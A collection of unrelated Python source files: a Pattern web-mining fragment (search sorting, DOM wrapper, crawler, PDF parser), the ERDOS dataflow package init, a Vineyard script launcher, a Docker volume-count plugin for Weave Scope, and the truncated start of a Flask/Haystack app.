kw[a] = kwargs.pop(a)
return engine(**kw).search(string, **kwargs)
except UnboundLocalError:
raise SearchEngineError, "unknown search engine '%s'" % service
#--- WEB SORT --------------------------------------------------------------------------------------
SERVICES = {
GOOGLE : Google,
YAHOO : Yahoo,
BING : Bing,
TWITTER : Twitter,
WIKIPEDIA : Wikipedia,
WIKIA : Wikia,
FLICKR : Flickr,
FACEBOOK : Facebook
}
def sort(terms=[], context="", service=GOOGLE, license=None, strict=True, reverse=False, **kwargs):
""" Returns a list of (percentage, term)-tuples for the given list of terms.
Sorts the terms in the list according to search result count.
When a context is defined, sorts according to relevancy to the context, e.g.:
sort(terms=["black", "green", "red"], context="Darth Vader") =>
yields "black" as the best candidate, because "black Darth Vader" is more common in search results.
- terms : list of search terms,
- context : term used for sorting,
- service : web service name (GOOGLE, YAHOO, BING),
- license : web service license id,
- strict : when True the query constructed from term + context is wrapped in quotes.
"""
service = SERVICES.get(service, SearchEngine)(license, language=kwargs.pop("language", None))
R = []
for word in terms:
q = reverse and context+" "+word or word+" "+context
q = q.strip()
q = strict and "\"%s\"" % q or q
r = service.search(q, count=1, **kwargs)
R.append(r)
s = float(sum([r.total or 1 for r in R])) or 1.0
R = [((r.total or 1)/s, r.query) for r in R]
R = sorted(R, reverse=True)
return R
#print sort(["black", "happy"], "darth vader", GOOGLE)
#### DOCUMENT OBJECT MODEL #########################################################################
# Tree traversal of HTML source code.
# The Document Object Model (DOM) is a cross-platform and language-independent convention
# for representing and interacting with objects in HTML, XHTML and XML documents.
# BeautifulSoup is wrapped in Document, Element and Text classes that resemble the Javascript DOM.
# BeautifulSoup can of course be used directly since it is imported here.
# http://www.crummy.com/software/BeautifulSoup/
SOUP = (
BeautifulSoup.BeautifulSoup,
BeautifulSoup.Tag,
BeautifulSoup.NavigableString,
BeautifulSoup.Comment
)
NODE, TEXT, COMMENT, ELEMENT, DOCUMENT = \
"node", "text", "comment", "element", "document"
#--- NODE ------------------------------------------------------------------------------------------
class Node:
def __init__(self, html, type=NODE, **kwargs):
""" The base class for Text, Comment and Element.
All DOM nodes can be navigated in the same way (e.g. Node.parent, Node.children, ...)
"""
self.type = type
self._p = not isinstance(html, SOUP) and BeautifulSoup.BeautifulSoup(u(html), **kwargs) or html
@property
def _beautifulSoup(self):
# If you must, access the BeautifulSoup object with Node._beautifulSoup.
return self._p
def __eq__(self, other):
# Two Node objects containing the same BeautifulSoup object are the same.
return isinstance(other, Node) and hash(self._p) == hash(other._p)
def _wrap(self, x):
# Navigating to other nodes yields either Text, Element or None.
if isinstance(x, BeautifulSoup.Comment):
return Comment(x)
if isinstance(x, BeautifulSoup.Declaration):
return Text(x)
if isinstance(x, BeautifulSoup.NavigableString):
return Text(x)
if isinstance(x, BeautifulSoup.Tag):
return Element(x)
@property
def parent(self):
return self._wrap(self._p.parent)
@property
def children(self):
return hasattr(self._p, "contents") and [self._wrap(x) for x in self._p.contents] or []
@property
def html(self):
return self.__unicode__()
@property
def source(self):
return self.__unicode__()
@property
def next_sibling(self):
return self._wrap(self._p.nextSibling)
@property
def previous_sibling(self):
return self._wrap(self._p.previousSibling)
next, previous = next_sibling, previous_sibling
def traverse(self, visit=lambda node: None):
""" Executes the visit function on this node and each of its child nodes.
"""
visit(self); [node.traverse(visit) for node in self.children]
def __len__(self):
return len(self.children)
def __iter__(self):
return iter(self.children)
def __getitem__(self, index):
return self.children[index]
def __repr__(self):
return "Node(type=%s)" % repr(self.type)
def __str__(self):
return bytestring(self.__unicode__())
def __unicode__(self):
return u(self._p)
#--- TEXT ------------------------------------------------------------------------------------------
class Text(Node):
""" Text represents a chunk of text without formatting in a HTML document.
For example: "the <b>cat</b>" is parsed to [Text("the"), Element("cat")].
"""
def __init__(self, string):
Node.__init__(self, string, type=TEXT)
def __repr__(self):
return "Text(%s)" % repr(self._p)
class Comment(Text):
""" Comment represents a comment in the HTML source code.
For example: "<!-- comment -->".
"""
def __init__(self, string):
Node.__init__(self, string, type=COMMENT)
def __repr__(self):
return "Comment(%s)" % repr(self._p)
#--- ELEMENT ---------------------------------------------------------------------------------------
class Element(Node):
def __init__(self, html):
""" Element represents an element or tag in the HTML source code.
For example: "<b>hello</b>" is a "b"-Element containing a child Text("hello").
"""
Node.__init__(self, html, type=ELEMENT)
@property
def tagname(self):
return self._p.name
tag = tagName = tagname
@property
def attributes(self):
return self._p._getAttrMap()
@property
def id(self):
return self.attributes.get("id")
def get_elements_by_tagname(self, v):
""" Returns a list of nested Elements with the given tag name.
The tag name can include a class (e.g. div.header) or an id (e.g. div#content).
"""
if isinstance(v, basestring) and "#" in v:
v1, v2 = v.split("#")
v1 = v1 in ("*","") or v1.lower()
return [Element(x) for x in self._p.findAll(v1, id=v2)]
if isinstance(v, basestring) and "." in v:
v1, v2 = v.split(".")
v1 = v1 in ("*","") or v1.lower()
return [Element(x) for x in self._p.findAll(v1, v2)]
return [Element(x) for x in self._p.findAll(v in ("*","") or v.lower())]
by_tag = getElementsByTagname = get_elements_by_tagname
def get_element_by_id(self, v):
""" Returns the first nested Element with the given id attribute value.
"""
return ([Element(x) for x in self._p.findAll(id=v, limit=1) or []]+[None])[0]
by_id = getElementById = get_element_by_id
def get_elements_by_classname(self, v):
""" Returns a list of nested Elements with the given class attribute value.
"""
return [Element(x) for x in (self._p.findAll(True, v))]
by_class = getElementsByClassname = get_elements_by_classname
def get_elements_by_attribute(self, **kwargs):
""" Returns a list of nested Elements with the given attribute value.
"""
return [Element(x) for x in (self._p.findAll(True, attrs=kwargs))]
by_attribute = getElementsByAttribute = get_elements_by_attribute
@property
def content(self):
""" Yields the element content as a unicode string.
"""
return u"".join([u(x) for x in self._p.contents])
@property
def source(self):
""" Yields the HTML source as a unicode string (tag + content).
"""
return u(self._p)
html = source
def __getattr__(self, k):
if k in self.__dict__:
return self.__dict__[k]
if k in self.attributes:
return self.attributes[k]
raise AttributeError, "'Element' object has no attribute '%s'" % k
def __repr__(self):
return "Element(tag='%s')" % bytestring(self.tagname)
#--- DOCUMENT --------------------------------------------------------------------------------------
class Document(Element):
def __init__(self, html, **kwargs):
""" Document is the top-level element in the Document Object Model.
It contains nested Element, Text and Comment nodes.
"""
# Aliases for BeautifulSoup optional parameters:
kwargs["selfClosingTags"] = kwargs.pop("self_closing", kwargs.get("selfClosingTags"))
Node.__init__(self, u(html).strip(), type=DOCUMENT, **kwargs)
@property
def declaration(self):
""" Yields the <!doctype> declaration, as a TEXT Node or None.
"""
for child in self.children:
if isinstance(child._p, BeautifulSoup.Declaration):
return child
@property
def head(self):
return self._wrap(self._p.head)
@property
def body(self):
return self._wrap(self._p.body)
@property
def tagname(self):
return None
tag = tagname
def __repr__(self):
return "Document()"
DOM = Document
#article = Wikipedia().search("Document Object Model")
#dom = DOM(article.html)
#print dom.get_element_by_id("References").source
#print [element.attributes["href"] for element in dom.get_elements_by_tagname("a")]
#print dom.get_elements_by_tagname("p")[0].next.previous.children[0].parent.__class__
#print
#### WEB CRAWLER ###################################################################################
# Tested with a crawl across 1,000 domains so far.
class Link:
def __init__(self, url, text="", relation="", referrer=""):
""" A hyperlink parsed from a HTML document, in the form:
<a href="url"", title="text", rel="relation">xxx</a>.
"""
self.url, self.text, self.relation, self.referrer = \
u(url), u(text), u(relation), u(referrer),
@property
def description(self):
return self.text
def __repr__(self):
return "Link(url=%s)" % repr(self.url)
# Used for sorting in Spider.links:
def __eq__(self, link):
return self.url == link.url
def __ne__(self, link):
return self.url != link.url
def __lt__(self, link):
return self.url < link.url
def __gt__(self, link):
return self.url > link.url
class HTMLLinkParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
def parse(self, html, url=""):
""" Returns a list of Links parsed from the given HTML string.
"""
if html is None:
return None
self._url = url
self._data = []
self.feed(self.clean(html))
self.close()
self.reset()
return self._data
def handle_starttag(self, tag, attributes):
if tag == "a":
attributes = dict(attributes)
if "href" in attributes:
link = Link(url = attributes.get("href"),
text = attributes.get("title"),
relation = attributes.get("rel", ""),
referrer = self._url)
self._data.append(link)
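# A hedged sketch (not part of the original module): HTMLLinkParser.parse() returns
# the <a href=...> links found in an HTML string; the markup below is only an illustration.
#html = '<a href="/wiki/Cat" title="Cat" rel="nofollow">cat</a>'
#for link in HTMLLinkParser().parse(html, url="http://en.wikipedia.org"):
#    print link.url, link.text, link.relation, link.referrer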
def base(url):
""" Returns the URL domain name:
http://en.wikipedia.org/wiki/Web_crawler => en.wikipedia.org
"""
return urlparse.urlparse(url).netloc
def abs(url, base=None):
""" Returns the absolute URL:
../media + http://en.wikipedia.org/wiki/ => http://en.wikipedia.org/media
"""
if url.startswith("#") and not base is None and not base.endswith("/"):
if not re.search("[^/]/[^/]", base):
base += "/"
return urlparse.urljoin(base, url)
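# A hedged sketch: base() extracts the domain name and abs() resolves a relative URL
# against a base; the URLs below are only illustrations.
#print base("http://en.wikipedia.org/wiki/Web_crawler") # => "en.wikipedia.org"
#print abs("../media", base="http://en.wikipedia.org/wiki/") # => "http://en.wikipedia.org/media"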
DEPTH = "depth"
BREADTH = "breadth"
FIFO = "fifo" # First In, First Out.
FILO = "filo" # First In, Last Out.
LIFO = "lifo" # Last In, First Out (= FILO).
class Spider:
def __init__(self, links=[], domains=[], delay=20.0, parser=HTMLLinkParser().parse, sort=FIFO):
""" A spider can be used to browse the web in an automated manner.
It visits the list of starting URLs, parses links from their content, visits those, etc.
- Links can be prioritized by overriding Spider.priority().
- Links can be ignored by overriding Spider.follow().
- Each visited link is passed to Spider.visit(), which can be overridden.
"""
self.parse = parser
self.delay = delay # Delay between visits to the same (sub)domain.
self.domains = domains # Domains the spider is allowed to visit.
self.history = {} # Domain name => time last visited.
self.visited = {} # URLs visited.
self._queue = [] # URLs scheduled for a visit: (priority, time, Link).
self._queued = {} # URLs scheduled so far, lookup dictionary.
self.QUEUE = 10000 # Increase or decrease according to available memory.
self.sort = sort
# Queue given links in given order:
for link in (isinstance(links, basestring) and [links] or links):
self.push(link, priority=1.0, sort=FIFO)
@property
def done(self):
""" Yields True if no further links are scheduled to visit.
"""
return len(self._queue) == 0
def push(self, link, priority=1.0, sort=FILO):
""" Pushes the given link to the queue.
Position in the queue is determined by priority.
Equal ranks are sorted FIFO or FILO.
With priority=1.0 and FILO, the link is inserted at the front of the queue.
With priority=0.0 and FIFO, the link is appended at the back of the queue.
"""
if not isinstance(link, Link):
link = Link(url=link)
dt = time.time()
dt = sort == FIFO and dt or 1 / dt
bisect.insort(self._queue, (1 - priority, dt, link))
self._queued[link.url] = True
def pop(self, remove=True):
""" Returns the next Link queued to visit and removes it from the queue.
Links on a recently visited (sub)domain are skipped until Spider.delay has elapsed.
"""
now = time.time()
for i, (priority, dt, link) in enumerate(self._queue):
if self.delay <= now - self.history.get(base(link.url), 0):
if remove is True:
self._queue.pop(i)
self._queued.pop(link.url, None)
return link
@property
def next(self):
""" Returns the next Link queued to visit (without removing it).
"""
return self.pop(remove=False)
def crawl(self, method=DEPTH, **kwargs):
""" Visits the next link in Spider._queue.
If the link is on a domain recently visited (< Spider.delay) it is skipped.
Parses the content at the link for new links and adds them to the queue,
according to their Spider.priority().
Visited links (and content) are passed to Spider.visit().
"""
link = self.pop()
if link is None:
return False
if link.url not in self.visited:
t = time.time()
url = URL(link.url)
if url.mimetype == "text/html":
try:
kwargs.setdefault("unicode", True)
html = url.download(**kwargs)
for new in self.parse(html, url=link.url):
new.url = abs(new.url, base=url.redirect or link.url)
new.url = self.normalize(new.url)
# 1) Parse new links from HTML web pages.
# 2) Schedule unknown links for a visit.
# 3) Only links that are not already queued are queued.
# 4) Only links for which Spider.follow() is True are queued.
# 5) Only links on Spider.domains are queued.
if new.url in self.visited:
continue
if new.url in self._queued:
continue
if self.follow(new) is False:
continue
if self.domains and not base(new.url).endswith(tuple(self.domains)):
continue
# 6) Limit the queue (remove tail), unless you are Google.
if self.QUEUE is not None and \
self.QUEUE * 1.25 < len(self._queue):
self._queue = self._queue[:self.QUEUE]
self._queued.clear()
self._queued.update(dict((q[2].url, True) for q in self._queue))
# 7) Position in the queue is determined by Spider.priority().
# 8) Equal ranks are sorted FIFO or FILO.
self.push(new, priority=self.priority(new, method=method), sort=self.sort)
self.visit(link, source=html)
except URLError:
# URL can not be reached (HTTP404NotFound, URLTimeout).
self.fail(link)
else:
# URL MIME-type is not HTML, don't know how to handle.
self.fail(link)
# Log the current time visited for the domain (see Spider.pop()).
# Log the URL as visited.
self.history[base(link.url)] = time.time()
self.visited[link.url] = True
return True
# Nothing happened, we already visited this link.
return False
def normalize(self, url):
""" Called from Spider.crawl() to normalize URLs.
For example: return url.split("?")[0]
"""
# All links pass through here (visited or not).
# This can be a place to count backlinks.
return url
def follow(self, link):
""" Called from Spider.crawl() to determine if it should follow this link.
For example: return "nofollow" not in link.relation
"""
return True
def priority(self, link, method=DEPTH):
""" Called from Spider.crawl() to determine the priority of this link,
as a number between 0.0-1.0. Links with higher priority are visited first.
"""
# Depth-first search dislikes external links to other (sub)domains.
external = base(link.url) != base(link.referrer)
if external is True:
if method == DEPTH:
return 0.75
if method == BREADTH:
return 0.85
return 0.80
def visit(self, link, source=None):
""" Called from Spider.crawl() when the link is crawled.
When source=None, the link is not a web page (and was not parsed),
or possibly a URLTimeout occurred (content size too big).
"""
pass
def fail(self, link):
""" Called from Spider.crawl() for link whose MIME-type could not be determined,
or which raised a URLError on download.
"""
pass
#class Spiderling(Spider):
# def visit(self, link, source=None):
# print "visited:", link.url, "from:", link.referrer
# def fail(self, link):
# print "failed:", link.url
#
#s = Spiderling(links=["http://nodebox.net/"], domains=["nodebox.net"], delay=5)
#while not s.done:
# s.crawl(method=DEPTH, cached=True, throttle=5)
#--- CRAWL FUNCTION --------------------------------------------------------------------------------
# Functional approach to crawling.
Crawler = Spider
def crawl(links=[], domains=[], delay=20.0, parser=HTMLLinkParser().parse, sort=FIFO, method=DEPTH, **kwargs):
""" Returns a generator that yields (Link, source)-tuples of visited pages.
When the crawler is busy, it yields (None, None).
When the crawler is done, it yields None.
"""
# The scenarios below define "busy":
# - crawl(delay=10, throttle=0)
# The crawler will wait 10 seconds before visiting the same subdomain.
# The crawler will not throttle downloads, so the next link is visited instantly.
# So sometimes (None, None) is returned while it waits for an available subdomain.
# - crawl(delay=0, throttle=10)
# The crawler will halt 10 seconds after each visit.
# The crawler will not delay before visiting the same subdomain.
# So usually a result is returned each crawl.next(), but each call takes 10 seconds.
# - asynchronous(crawl().next)
# AsynchronousRequest.value is set to (Link, source) once AsynchronousRequest.done=True.
# The program will not halt in the meantime (i.e., the next crawl is threaded).
crawler = Crawler(links, domains, delay, parser, sort)
bind(crawler, "visit", \
lambda crawler, link, source=None: \
setattr(crawler, "crawled", (link, source))) # Define Crawler.visit() on-the-fly.
while not crawler.done:
crawler.crawled = (None, None)
crawler.crawl(method, **kwargs)
yield crawler.crawled
#for link, source in crawl("http://www.nodebox.net/", delay=0, throttle=10):
# print link
#g = crawl("http://www.nodebox.net/")
#for i in range(10):
# p = asynchronous(g.next)
# while not p.done:
# print "zzz..."
# time.sleep(0.1)
# link, source = p.value
# print link
#### PDF PARSER ####################################################################################
# Yusuke Shinyama, PDFMiner, http://www.unixuser.org/~euske/python/pdfminer/
class PDFParseError(Exception):
pass
class PDF:
def __init__(self, data, format=None):
""" Plaintext parsed from the given PDF data.
"""
self.content = self._parse(data, format)
@property
def string(self):
return self.content
def __unicode__(self):
return self.content
def _parse(self, data, format=None):
# The output will be ugly: it may be useful for mining but probably not for displaying.
# You can also try PDF(data, format="html") to preserve some layout information.
from pdf.pdfinterp import PDFResourceManager, process_pdf
from pdf.converter import TextConverter, HTMLConverter
from pdf.layout import LAParams
s = ""
m = PDFResourceManager()
try:
# Given data is a PDF file path.
data = os.path.exists(data) and open(data) or StringIO.StringIO(data)
except TypeError:
# Given data is a PDF string.
data = StringIO.StringIO(data)
try:
stream = StringIO.StringIO()
parser = format=="html" and HTMLConverter or TextConverter
parser = parser(m, stream, codec="utf-8", laparams=LAParams())
process_pdf(m, parser, data, set(), maxpages=0, password="")
except Exception, e:
raise PDFParseError, str(e)
s = stream.getvalue()
s = decode_utf8(s)
s = s.strip()
s = re.sub(r"([a-z])\-\n", "\\1", s) # Join hyphenated words.
s = s.replace("\n\n", "<!-- paragraph -->") # Preserve paragraph spacing.
s = s.replace("\n", " ")
s = s.replace("<!-- paragraph -->", "\n\n")
s = collapse_spaces(s)
return s
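#
# A hedged sketch (not part of the original module): PDF accepts either a file path or a
# raw PDF string; "paper.pdf" is only an illustration and PDFMiner must be installed.
#
#pdf = PDF("paper.pdf")
#print pdf.string[:200]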
|
__init__.py
|
import multiprocessing as mp
import signal
import sys
from functools import wraps
import erdos.internal as _internal
from erdos.streams import (ReadStream, WriteStream, LoopStream, IngestStream,
ExtractStream)
from erdos.operator import Operator, OperatorConfig
from erdos.profile import Profile
from erdos.message import Message, WatermarkMessage
from erdos.timestamp import Timestamp
import erdos.utils
_num_py_operators = 0
def connect(op_type, config, read_streams, *args, **kwargs):
"""Registers the operator and its connected streams on the dataflow graph.
The operator is created as follows:
`op_type(*read_streams, *write_streams, *args, **kwargs)`
Args:
op_type (type): The operator class. Should inherit from
`erdos.Operator`.
config (OperatorConfig): Configuration details required by the
operator.
read_streams: the streams from which the operator processes data.
args: arguments passed to the operator.
kwargs: keyword arguments passed to the operator.
Returns:
read_streams (list of ReadStream): ReadStreams corresponding to the
WriteStreams returned by the operator's connect.
"""
if not issubclass(op_type, Operator):
raise TypeError("{} must subclass erdos.Operator".format(op_type))
# 1-index operators because node 0 is reserved for the current process,
# and each node can only run 1 python operator.
global _num_py_operators
_num_py_operators += 1
node_id = _num_py_operators
py_read_streams = []
for stream in read_streams:
if isinstance(stream, LoopStream):
py_read_streams.append(stream._py_loop_stream.to_py_read_stream())
elif isinstance(stream, IngestStream):
py_read_streams.append(
stream._py_ingest_stream.to_py_read_stream())
elif isinstance(stream, ReadStream):
py_read_streams.append(stream._py_read_stream)
else:
raise TypeError("Unable to convert {stream} to ReadStream".format(
stream=stream))
internal_streams = _internal.connect(op_type, config, py_read_streams,
args, kwargs, node_id)
return [ReadStream(_py_read_stream=s) for s in internal_streams]
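# A hedged sketch (comments only, not part of this module): a driver typically calls
# connect() with an operator class, an OperatorConfig and its read streams, then runs the
# graph; MyOperator, camera_stream and the "name" keyword are assumed/hypothetical here.
#
#   (output_stream,) = erdos.connect(MyOperator, erdos.OperatorConfig(name="my_op"),
#                                    [camera_stream])
#   erdos.run()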
def reset():
"""Resets internal seed and creates a new dataflow graph.
Note that no streams or operators can be re-used safely.
"""
global _num_py_operators
_num_py_operators = 0
_internal.reset()
def run(graph_filename=None, start_port=9000):
"""Instantiates and runs the dataflow graph.
ERDOS will spawn 1 process for each python operator, and connect them via
TCP.
Args:
graph_filename (str): the filename to which to write the dataflow graph
as a DOT file.
start_port (int): the port on which to start. The start port is the
lowest port ERDOS will use to establish TCP connections between
operators.
"""
data_addresses = [
"127.0.0.1:{port}".format(port=start_port + i)
for i in range(_num_py_operators + 1)
]
control_addresses = [
"127.0.0.1:{port}".format(port=start_port + len(data_addresses) + i)
for i in range(_num_py_operators + 1)
]
def runner(node_id, data_addresses, control_addresses):
_internal.run(node_id, data_addresses, control_addresses)
processes = [
mp.Process(target=runner, args=(i, data_addresses, control_addresses))
for i in range(1, _num_py_operators + 1)
]
for p in processes:
p.start()
# Needed to shut down child processes
def sigint_handler(sig, frame):
for p in processes:
p.terminate()
sys.exit(0)
signal.signal(signal.SIGINT, sigint_handler)
# The driver must always be on node 0 otherwise ingest and extract streams
# will break
_internal.run_async(0, data_addresses, control_addresses, graph_filename)
for p in processes:
p.join()
def run_async(graph_filename=None, start_port=9000):
"""Instantiates and runs the dataflow graph asynchronously.
ERDOS will spawn 1 process for each python operator, and connect them via
TCP.
Args:
graph_filename (str): the filename to which to write the dataflow graph
as a DOT file.
start_port (int): the port on which to start. The start port is the
lowest port ERDOS will use to establish TCP connections between
operators.
"""
data_addresses = [
"127.0.0.1:{port}".format(port=start_port + i)
for i in range(_num_py_operators + 1)
]
control_addresses = [
"127.0.0.1:{port}".format(port=start_port + len(data_addresses) + i)
for i in range(_num_py_operators + 1)
]
def runner(node_id, data_addresses, control_addresses):
_internal.run(node_id, data_addresses, control_addresses)
processes = [
mp.Process(target=runner, args=(i, data_addresses, control_addresses))
for i in range(1, _num_py_operators + 1)
]
# Needed to shut down child processes
def sigint_handler(sig, frame):
for p in processes:
p.terminate()
sys.exit(0)
signal.signal(signal.SIGINT, sigint_handler)
for p in processes:
p.start()
# The driver must always be on node 0 otherwise ingest and extract streams
# will break
py_node_handle = _internal.run_async(0, data_addresses, control_addresses,
graph_filename)
return NodeHandle(py_node_handle, processes)
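# A hedged sketch: run_async() returns a NodeHandle whose shutdown() terminates the
# spawned operator processes; the driver body below is only an illustration.
#
#   handle = erdos.run_async()
#   try:
#       pass  # drive IngestStream / ExtractStream objects here
#   finally:
#       handle.shutdown()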
def add_watermark_callback(read_streams, write_streams, callback):
"""Adds a watermark callback across several read streams.
Args:
read_streams (list of ReadStream): streams on which the callback is
invoked.
write_streams (list of WriteStream): streams on which the callback
can send messages.
callback (timestamp, list of WriteStream -> None): a low watermark
callback.
"""
def internal_watermark_callback(coordinates, is_top):
timestamp = Timestamp(coordinates=coordinates, is_top=is_top)
callback(timestamp, *write_streams)
py_read_streams = [s._py_read_stream for s in read_streams]
_internal.add_watermark_callback(py_read_streams,
internal_watermark_callback)
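# A hedged sketch: register a low-watermark callback across two read streams that
# forwards the watermark on a write stream; left_stream, right_stream, write_stream and
# on_watermark are hypothetical names.
#
#   def on_watermark(timestamp, write_stream):
#       write_stream.send(erdos.WatermarkMessage(timestamp))
#
#   erdos.add_watermark_callback([left_stream, right_stream], [write_stream], on_watermark)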
def _flow_watermark_callback(timestamp, *write_streams):
"""Flows a watermark to all write streams."""
for write_stream in write_streams:
write_stream.send(WatermarkMessage(timestamp))
def profile(event_name, operator, event_data=None):
return Profile(event_name, operator, event_data)
def profile_method(**decorator_kwargs):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
if isinstance(args[0], Operator):
# The func is an operator method.
op_name = args[0].config.name
cb_name = func.__name__
if "event_name" in decorator_kwargs:
event_name = decorator_kwargs["event_name"]
else:
# Set the event name to the operator name and the callback
# name if it's not passed by the user.
event_name = op_name + "." + cb_name
timestamp = None
if len(args) > 1:
if isinstance(args[1], Timestamp):
# The func is a watermark callback.
timestamp = args[1]
elif isinstance(args[1], Message):
# The func is a callback.
timestamp = args[1].timestamp
else:
raise TypeError(
"@erdos.profile can only be used on operator methods")
with erdos.profile(event_name,
args[0],
event_data={"timestamp": str(timestamp)}):
func(*args, **kwargs)
return wrapper
return decorator
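# A hedged sketch: profile_method() wraps an operator callback so each invocation is
# recorded via erdos.profile(); MyOperator and on_msg are hypothetical names.
#
#   class MyOperator(erdos.Operator):
#       @erdos.profile_method(event_name="my_op.on_msg")
#       def on_msg(self, msg):
#           pass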
class NodeHandle(object):
"""Used to shutdown a dataflow created by `run_async`."""
def __init__(self, py_node_handle, processes):
self.py_node_handle = py_node_handle
self.processes = processes
def shutdown(self):
"""Shuts down the dataflow."""
print("shutting down other processes")
for p in self.processes:
p.terminate()
p.join()
print("shutting down node")
self.py_node_handle.shutdown_node()
print("done shutting down")
|
script.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2020 Alibaba Group Holding Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import logging
import os
import subprocess
import sys
import threading
from .launcher import Launcher, LauncherStatus
logger = logging.getLogger('vineyard')
class ScriptLauncher(Launcher):
''' Launch the job by executing a script.
The output of the script must be printed to stdout, rather than stderr.
'''
def __init__(self, script):
super(ScriptLauncher, self).__init__()
self._script = script
self._proc = None
self._listen_thrd = None
self._cmd = None
def run(self, *args, **kw):
# FIXME run self._script on a set of host machines; the host is decided
# by the arguments passed to the launcher in `__init__`, and by the input objects.
cmd = [self._script]
for arg in args:
if isinstance(arg, str):
cmd.append(arg.encode('unicode-escape').decode('utf-8'))
else:
cmd.append(repr(arg))
env = os.environ.copy()
for key, value in kw.items():
# If the key is all lowercase, treat it as a command-line argument;
# otherwise treat it as an environment variable.
if key.islower():
cmd.append('--%s' % key)
if isinstance(value, str):
cmd.append(value)
else:
cmd.append(repr(value))
else:
env[key] = value
logger.debug('command = %s', ' '.join(cmd))
self._cmd = cmd
self._proc = subprocess.Popen(cmd,
env=env,
universal_newlines=True,
encoding='utf-8',
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self._status = LauncherStatus.RUNNING
self._listen_thrd = threading.Thread(target=self.read_output, args=(self._proc.stdout, ))
self._listen_thrd.daemon = True
self._listen_thrd.start()
def wait(self, timeout=None):
# Fast path: use an existing response directly, since the io adaptor may finish immediately.
r = super(ScriptLauncher, self).wait(timeout=0)
if r is not None:
return r
elapsed, period = 0, 1
while self._proc.poll() is None:
if timeout is not None and elapsed > timeout:
raise TimeoutError('Unable to wait for status of job [%s] after %r seconds' % (self._cmd, timeout))
r = super(ScriptLauncher, self).wait(timeout=period)
elapsed += period
if r is None:
continue
else:
return r
r = super(ScriptLauncher, self).wait(timeout=period)
if r is not None:
return r
remaining = self._proc.stdout.read()
if remaining:
for line in remaining.split('\n'):
self.parse(line)
r = super(ScriptLauncher, self).wait(timeout=period)
if r is not None:
return r
raise RuntimeError('Failed to launch job [%s], exited with %r: %s' % (self._cmd, self._proc.poll(), remaining))
def read_output(self, stream):
while self._proc.poll() is None:
line = stream.readline()
self.parse(line)
logger.debug(line)
# consume all extra lines if the proc exits.
for line in stream.readlines():
self.parse(line)
logger.debug(line)
def join(self):
if self._proc.wait():
self._status = LauncherStatus.FAILED
else:
self._status = LauncherStatus.SUCCEED
# make sure the listen thread exits.
self._listen_thrd.join()
def dispose(self, desired=True):
if self._status == LauncherStatus.RUNNING:
self._proc.terminate()
if desired:
self._status = LauncherStatus.FAILED
else:
self._status = LauncherStatus.SUCCEED
return self._status
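# A hedged usage sketch (not part of this module): run a script and block until the base
# Launcher reports a result; "./job.sh", the arguments and the 60-second timeout are only
# illustrations, and parse()/wait() semantics come from the Launcher base class.
#
#   launcher = ScriptLauncher('./job.sh')
#   launcher.run('input.csv', worker_count=4)
#   result = launcher.wait(timeout=60)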
|
volume-count.py
|
#!/usr/bin/env python
from docker import Client
import BaseHTTPServer
import SocketServer
import datetime
import errno
import json
import os
import signal
import socket
import threading
import time
import urllib2
PLUGIN_ID="volume-count"
PLUGIN_UNIX_SOCK="/var/run/scope/plugins/" + PLUGIN_ID + ".sock"
DOCKER_SOCK="unix://var/run/docker.sock"
nodes = {}
def update_loop():
global nodes
next_call = time.time()
while True:
# Get current timestamp in RFC3339
timestamp = datetime.datetime.utcnow()
timestamp = timestamp.isoformat('T') + 'Z'
# Fetch and convert data to scope data model
new = {}
for container_id, volume_count in container_volume_counts().iteritems():
new["%s;<container>" % (container_id)] = {
'latest': {
'volume_count': {
'timestamp': timestamp,
'value': str(volume_count),
}
}
}
nodes = new
next_call += 5
time.sleep(next_call - time.time())
def start_update_loop():
updateThread = threading.Thread(target=update_loop)
updateThread.daemon = True
updateThread.start()
# List all containers, with the count of their volumes
def container_volume_counts():
containers = {}
cli = Client(base_url=DOCKER_SOCK, version='auto')
for c in cli.containers(all=True):
containers[c['Id']] = len(c['Mounts'])
return containers
class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
# The logger requires a client_address, but unix sockets don't have
# one, so we fake it.
self.client_address = "-"
# Generate our json body
body = json.dumps({
'Plugins': [
{
'id': PLUGIN_ID,
'label': 'Volume Counts',
'description': 'Shows how many volumes each container has mounted',
'interfaces': ['reporter'],
'api_version': '1',
}
],
'Container': {
'nodes': nodes,
# Templates tell the UI how to render this field.
'metadata_templates': {
'volume_count': {
# Key where this data can be found.
'id': "volume_count",
# Human-friendly field name
'label': "# Volumes",
# Look up the 'id' in the latest object.
'from': "latest",
# Priorities over 10 are hidden, lower is earlier in the list.
'priority': 0.1,
},
},
},
})
# Send the headers
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.send_header('Content-Length', len(body))
self.end_headers()
# Send the body
self.wfile.write(body)
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def delete_socket_file():
if os.path.exists(PLUGIN_UNIX_SOCK):
os.remove(PLUGIN_UNIX_SOCK)
def sig_handler(b, a):
delete_socket_file()
exit(0)
def main():
signal.signal(signal.SIGTERM, sig_handler)
signal.signal(signal.SIGINT, sig_handler)
start_update_loop()
# Ensure the socket directory exists
mkdir_p(os.path.dirname(PLUGIN_UNIX_SOCK))
# Remove existing socket in case it was left behind
delete_socket_file()
# Listen for connections on the unix socket
server = SocketServer.UnixStreamServer(PLUGIN_UNIX_SOCK, Handler)
try:
server.serve_forever()
except:
delete_socket_file()
raise
main()
|
app.py
|
import logging
import os
import threading
import shutil
from datetime import timedelta, datetime
from flask import Flask, render_template, request, session, jsonify, url_for, redirect
from haystack.document_store.elasticsearch import ElasticsearchDocumentStore
from haystack.preprocessor.utils import convert_files_to_dicts
from haystack.preprocessor.cleaning import clean_wiki_text
from haystack import Finder
from haystack.retriever.sparse import ElasticsearchRetriever
from haystack.reader.transformers import TransformersReader
from elasticsearch import Elasticsearch
es = (
Elasticsearch()
